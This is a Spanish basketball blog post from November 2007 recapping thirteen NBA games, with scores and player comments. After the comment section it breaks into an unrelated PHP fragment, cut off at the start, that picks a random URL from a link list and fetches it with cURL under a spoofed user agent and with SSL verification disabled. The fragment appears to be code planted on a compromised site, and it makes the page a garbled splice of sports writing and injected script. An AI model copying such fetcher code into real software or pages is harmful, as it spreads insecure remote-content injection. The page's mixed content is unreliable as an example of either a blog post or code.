La crónica (noche del 02/11/07)

03 de November de 2007 por Jabho

kgverdeUna noche con 13 partidos debe dar para mucho. Así fue. Estreno triunfal de Garnett en Boston, Lebron se sacó la espina de su primer partido, los Raptors empiezan fuerte, Indiana gana y se pone 2-0, Yi mal, Horford bien, Dallas y Phoenix se lo toman con calma, Kaman sostiene la zona de los Clippers, Lakers ganan sin exhibición de Kobe, San Antonio suma y sigue…

Crónica de la noche…

Bucks 99 – Bobcats 102

Dos equipos con opciones de Playoffs y que disputaron un partido muy igualado. Al final ganaron los de casa con buena aportación del cuarteto Felton, Richardson, Wallace y Okafor. Es una pena que a este equipo le castiguen tanto las lesiones porque el banco con May y Morrison sería otra cosa. Ayer el banco muy flojo, incluido Hermann que tras el gran final de la pasada campaña deberia asentanrse en esta. Por los Bucks bien el juego exterior y Bogut que cumplió en el rebote. Yi y Villanueva, junto al propio Bogut, deben dar un paso al frente por el bien del equipo.

Pistons 116 – Magic 92

Piedra de toque para los renovados Magics y derrota. A Detroit, sin Hamilton, le bastó su habitual buen partido de conjunto para ganar el partido. El rookie Affalo volvió a ser titular y Maxiel sigue aumentando su aportación. Empieza a haber un banco importante en Detroit y aun está por aparecer Stukey. Por parte de Orlando el banquillo, 8 de 28 y sólo 6 rebotes, debe aportar mucho más.

Heat 85 – Pacers 87

Mal empiezan los Heat, aunque dudo que les importe. Este equipo no está para jugar a tope desde el incio. Sin Wade la referencia exterior es Davis, que cumplió. Shaq muy flojo, aunque a su edad es de esperar que vaya a más segun avanze la temporada. El rookie Cook aprovechó sus minutos e hizo un buen partido. Arrancan bien los Pacers. Granger lleva dos partidazos. Dunleavy y Diogu tambien han jugado bien. hay que esperar a que Tinsley, Murphy y, sobretodo, Jermaine se pongan a punto para ver las posibilidades reales de este equipo.

Raptors 106 – Nets 69

Toronto es uno de las plantillas mas largas y equilibradas de la liga. Anoche lo demostró. Delfino, Calderon y Dixon tuvieron una gran aportación desde el banco. Lo que sumado al buen arranque de Bargnani les dió una victoria fácil. En los Nets solo Jefferson y el rato que aguantó Krstic dieron la cara. Muy poco para estos Raptors.

Mavericks 94 – Hawks 101

Ya tuvo Dallas un arranque tranquilo el año pasado. Ayer los jovenes Hawks liderados por Joe Johnson y secundandos por Josh Smtih, Marvin Williams y Al Horford les ganaron un partido que fue igualado hasta el último minuto. Dirk, Terry y, buena noticia, Barea hicieron un buen partido por parte de los tejanos.

Kincks 106 – Cavaliers 110

Lebron con 45 puntos, 7 asistencias y 7 rebotes y Gibson con 24 puntos y 6 de 9 en triples tumbaron a unos Kincks donde apenas jugaron 7 jugadores. Crawford, Zach, Curry y Nate estuvieron bien en ataque y sorprende, o no, los pocos minutos de Lee. Parece que Isiah Thomas a perdido la paciencia y la confianza en Marbury que fue sustuido a falta de poco mas de 4 minutos con el partido por decidir. Después del partido Thomas declaró que este año los mejores jugarán ¿no deberia ser siempre así?

Wizards 83 – Celtics 103

Gran expectación por ver a Boston que no defraudaron. El Big Three de Boston pudo con el Big Three de Whasington. Garnett, Pierce y Allen hicieron 67 de los 103 puntos, 29 de los 46 rebotes y 11 de las 20 asistencias. Por los Wizards cumplieron Butler y Songaila. Arenas hizo 21 puntos pero con malos porcentajes de tiro.

Trail Blazers 93 – Hornets 113

Siete jugadores de los Hornets sumaron mas de 10 puntos para superar a los Blazers donde sólo Brandon Roy opuso algo de resistencia. Sergio jugó casi 12 minutos que, ójala no lo fuera, es noticia. Mal panorama en Porland.

Nuggets 99 – Timberwolves 91

Melo, 33, e Iverson, 24, anotando y Camby dominado la zona, 21 rebotes y 6 tapones, fue suficiente para superar a Minnesota donde Al Jeff, McCants y Rattlif fueron las notas positivas. Mucho van a sufrir este año los lobos. Denver arranca bien y necesitará una buena marca si quiere tener opciones de superar la fatídica prinera ronda de Playoffs.

76ers 96 – Bulls 85

Dos derrotas seguidas para los Bulls que estan llamados a ser uno de los gallitos del Este. En los Bulls no se espera que halla gran anotación interior pero si que al menos controlen el rebote. Ayer los sixers dominaron el rebote y a partir de ahí, guiados por Miller e Iguodala, se llevaron la victoria. Tyrus Thomas, Gordon y Nocioni lo mas positivo para los de Chicago.

Kings 80 – Spurs 96

Empieza temporada como acabó la anterior, con los Spurs ganando. Y es que son mucho perro estos Spurs para tan poco hueso como son los Kings. En los Spurs destacar que 11 jugadores jugaron al menos 12 minutos. En los Kings a esperar la vuelta de Bibby y Artest.

Lakers 119 – Suns 98

Soprende una victoria de los Lakers ante los Suns y más si el máximo anotador angelino es Radmanovic con 19 puntos. ¿Kobe? 16 puntos y 11 rebotes. Los Suns también arrancaron mal la temporada pasada. Nash y Stoudemire no están en su mejor momento pero llegarán. Entonces será más dificil ganarles.

Warriors 114 – Clippers 120

26 puntos y 18 rebotes de Kaman ante un equipo que el año pasado les quitó el puesto de Playoffs en el último momento. Bien es cierto que el juego interior de los Warriors no es de los mejores de la liga. Mobey y Thomas apoyaron a Kaman con 21 y 20 puntos respectivamente. Por los Warriors Azubuike hizo la mejor marca de su corta carrera con 33 puntos. Baron Davis con 22 puntos, 11 asistencias y 8 rebotes también cuajó una actuación destacada.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>